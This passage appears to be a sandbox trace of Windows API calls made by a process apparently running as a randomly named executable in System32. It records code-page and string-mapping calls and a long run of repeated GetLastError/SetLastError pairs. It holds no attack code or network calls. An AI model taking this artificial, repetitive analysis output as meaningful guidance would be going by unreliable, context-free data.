(dwErrCode=0x0) [0032.077] GetACP () returned 0x4e4 [0032.077] GetLastError () returned 0x0 [0032.077] SetLastError (dwErrCode=0x0) [0032.077] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.077] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef78c | out: lpCPInfo=0x2ef78c) returned 1 [0032.077] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef258 | out: lpCPInfo=0x2ef258) returned 1 [0032.077] GetLastError () returned 0x0 [0032.077] SetLastError (dwErrCode=0x0) [0032.077] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef1e8 | out: lpCharType=0x2ef1e8) returned 1 [0032.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef66c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef66c, cbMultiByte=256, lpWideCharStr=0x2eefd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0032.077] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2ef26c | out: lpCharType=0x2ef26c) returned 1 [0032.077] GetLastError () returned 0x0 [0032.077] SetLastError (dwErrCode=0x0) [0032.077] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef66c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef66c, cbMultiByte=256, lpWideCharStr=0x2eefa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.078] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.078] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eed98, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.078] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef56c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿáùªõ¤÷.", lpUsedDefaultChar=0x0) returned 256 [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef66c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef66c, cbMultiByte=256, lpWideCharStr=0x2eefc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.078] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.078] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eedb8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.078] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef46c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿáùªõ¤÷.", lpUsedDefaultChar=0x0) returned 256 [0032.078] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.078] GetLastError () returned 0x0 [0032.078] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.079] GetLastError () returned 0x0 [0032.079] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.080] GetLastError () returned 0x0 [0032.080] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.081] SetLastError (dwErrCode=0x0) [0032.081] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.082] SetLastError (dwErrCode=0x0) [0032.082] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.083] GetLastError () returned 0x0 [0032.083] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.084] GetLastError () returned 0x0 [0032.084] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.085] GetLastError () returned 0x0 [0032.085] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.086] GetLastError () returned 0x0 [0032.086] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 [0032.087] SetLastError (dwErrCode=0x0) [0032.087] GetLastError () returned 0x0 